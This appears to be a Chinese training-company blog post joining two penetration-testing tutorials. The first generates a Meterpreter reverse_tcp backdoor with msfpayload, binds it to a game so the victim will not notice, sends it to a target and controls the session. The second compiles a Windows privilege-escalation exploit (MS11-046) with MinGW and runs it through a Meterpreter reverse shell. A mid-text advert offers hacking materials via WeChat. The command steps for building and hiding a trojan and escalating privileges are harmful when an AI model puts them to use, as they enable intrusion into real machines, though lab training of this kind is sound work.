Kali渗透Windows服务器

Posted 2023-05-30 蚁景科技

这个实验主要让我们学习漏洞扫描技术基本原理，了解其在网络攻防中的作用，掌握使用Kali中的Metasploit对目标主机渗透，并根据报告做出相应的防护措施。

这个实验主要让我们学习漏洞扫描技术基本原理，了解其在网络攻防中的作用，掌握使用Kali中的Metasploit对目标主机渗透，并根据报告做出相应的防护措施。

本次实战环境：Kali渗透Windows服务器

实战步骤一

本实验通过利用kali进行漏洞扫描，使用Metasploit对目标主机进行渗透测试，并根据报告做出相应的防护措施，共分为3个实验步骤，详情如下；

1、 实战步骤一：生成setup.exe后门程序，即木马程序。

（1） 打开kali终端，输入ifconfig， 得到本机ip为192.168.189.130。

如下图：

（2）输入以下命令，使用msfpayload生成名为setup的后门程序：

msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.189.130 x > setup.exe 如下图：

（3） 进入setup.exe所在目录，修改属性：选择“允许以程序执行文件”。

如下图所示：

（4） 终端中输入首先msfconsole；然后输入use exploit/multi/handler来加载 exploit/multi/handler 模块；输入set LHOST 192.168.189.130来设置本地主机；然后输入exploit -z -j开始监听，如下图所示：

实战步骤二

将上面生成的木马程序与某个软件进行捆绑。

【----帮助网安学习，以下所有学习资料免费领！加vx：yj009991，备注 “博客园” 获取！】

　① 网安学习成长路径思维导图
　② 60+网安经典常用工具包
　③ 100+SRC漏洞分析报告
　④ 150+网安攻防实战技术电子书
　⑤ 最权威CISSP 认证考试指南+题库
　⑥ 超1800页CTF实战技巧手册
　⑦ 最新网安大厂面试题合集（含答案）
　⑧ APP客户端安全检测指南（安卓+IOS）

（1）可以在windows系统下使用exe捆绑软件将setup.exe和一个其他的某个安全软件合并为一个软件，这样在运行软件时两个软件同时运行，不会引起注意。在tools里面进入名为exekunbang的文件，先打开ExeBinder.exe捆绑软件。选择第一个要合并的软件，默认选择本软件中自带的小游戏程序：

点击下一步，选择第二个要捆绑的软件，即之前生成的木马程序setup.exe：

点击下一步，选择一个文件要保存的路径:

继续点击下一步，开始捆绑软件:

(2) 将捆绑后的软件发送给目标主机。

实战步骤三

检测目标主机，对目标主机进行渗透测试。

（2） 目标主机执行程序后，在kali终端中的检测程序会及时检测到。在检测到目标主机运行程序后，后门程序会反向连接到msf，之后msf发起第二次攻击（开始渗透），然后客户端（后门程序）连接到服务端（msf）。输入sessionss：

可以看到目标主机的ip为192.168.189.129，

（2）再继续输入sessions -i 1,之后可以对目标主机进行一系列的操作。如输入sysinfo可知道目标主机的系统信息；输入 getuid查看对方正在运行的用户。

要养成多思考多总结的习惯，对实验结果多去分析，这样回收获更多。比如如何利用kali进行漏洞扫描；如何使用Metasploit对目标主机进行渗透测试；这些都是这次实战后可以去思考的。

更多网安技能的在线实操练习，请点击这里>>

 

合天智汇：合天网络靶场、网安实战虚拟环境

如何在Kali Linux下编译Windows Exploit

前言

微软的Windows在企业或是个人应用领域占据着最大的市场份额，在渗透测试过程中你会经常遇到很多Windows的工作站和服务器。另一方面，大多数渗透测试人员主要使用基于Linux的发行版渗透测试系统，比如Kali Linux或者Pentoo和Backbox。因此你可能就需要有在Linux机器上快速编译Windows Exploit的能力。一款叫做“Mingw-w64”的软件可以解决这个问题。

Mingw-w64 是一款用于创建Windows应用程序的开源开发环境。Mingw-w64源码Mingw32，因为它起初并不支持 64位的操作系统。在本教程中，我将演示如何在Kali Linux下编译Windows Exploit。下面让我们先在Kali Linux上安装 Mingw-w64 。

Kali Linux安装Mingw-w64

Kali Linux 2.0并未集成Mingw-w64，需要我们手动安装。命令如下：

输入“Y”继续安装。安装需要等待一段时间。

找不到MinGW-W64安装包

在安装过程中可能会提示你无法找到MinGW-W64安装包：

要解决这个问题得确保在sources.list文件有可用的存储库。使用nano来编辑该文件：

/etc/apt/sources.list

检查存储库是否正确可用，不同版本Kali Linux的存储库可以在以下页面找到：

http://docs.kali.org/general-use/kali-linux-sources-list-repositories

正确配置好sources.list文件的存储库之后使用apt-get update来更新源，然后重新安装Mingw-w64即可。

使用MinGW-W64编译Windows Exploit

成功安装Mingw-w64之后，我将以CVE-2011-1249（MS11-046）漏洞为例，它是一个用C语言编写的Windows 7 SP0 x86上的一个Exploit。这个版本的Windows系统在辅助功能驱动程序（AFD）中包含一个特权提升漏洞。Mingw-w64虽然是为64位的系统定制的，但它依然可以编译32位的Windows Exploit。

我们先从Exploit-db上下载需要编译的Exploit：

使用以下命令编译Windows 32位的afd.sys Exploit：

编译Windows 7 afd.sys提权Exploit的命令如下：

编译完成后将编译好的exe文件拷贝到Apache web服务根目录下测试利用，使用cmd.exe打开可以看到如下信息：

可以看到编译好的Exploit在windows 7上被成功执行后将我们的权限从test提升为了system。这个Exploit是在当前shell中生成了一个新的shell，而不是在新窗口中创建新shell 。这意味着我们可以从命令行shell运行此利用程序。比如在Meterpreter中。

Meterpreter shell下利用

我们可以使用Msfvenom来快速生成一个Meterpreter的TCP反弹shell，并在目标主机上执行。同时我们使用 Metasploit下的Multi handler来处理反弹会话。使用以下命令生成 Payload：

IP和Port根据自身情况填写然后启动msfconsole配置Multi handler exploit：

下载Exploit并执行，我们就会得到目标主机Meterpreter会话shell ：

然后我们就可以通过shell进入命令行console运行Exploit来实现权限的提升操作：

如图我们成功将普通权限提升为了系统权限。由于在执行它的shell中生成了一个新的系统shell，我们权限将会受到一定限制，导致我们无法在原来的shell中看到Exploit的输出信息。Exit退出到普通shell中就可以看到Exploit的输出信息：

MottoIN小编注

Kali 下编译 Exploit

gcc -m32 -o output32 hello.c (32 位) 
gcc -m64 -o output hello.c (64 位)

Kali 下编译 Windows Exploit

wget -O mingw-get-setup.exe http://sourceforge.net/projects/mingw/files/Installer/mingw-get-setup.exe/download 
wine mingw-get-setup.exe 
select mingw32-base 
cd /root/.wine/drive_c/windows 
wget http://gojhonny.com/misc/mingw_bin.zip && unzip mingw_bin.zip 
cd /root/.wine/drive_c/MinGW/bin 
wine gcc -o ability.exe /tmp/exploit.c -lwsock32 
wine ability.exe